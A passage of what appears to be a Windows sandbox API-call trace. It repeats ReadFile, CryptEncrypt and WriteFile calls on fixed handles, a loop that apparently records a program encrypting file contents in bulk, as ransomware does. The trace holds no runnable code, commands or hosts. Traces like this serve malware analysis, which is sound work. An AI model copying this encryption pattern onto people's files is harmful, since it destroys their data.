lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.502] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.502] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.503] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.503] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.504] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.504] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.505] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.505] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.506] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.506] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.507] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.507] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 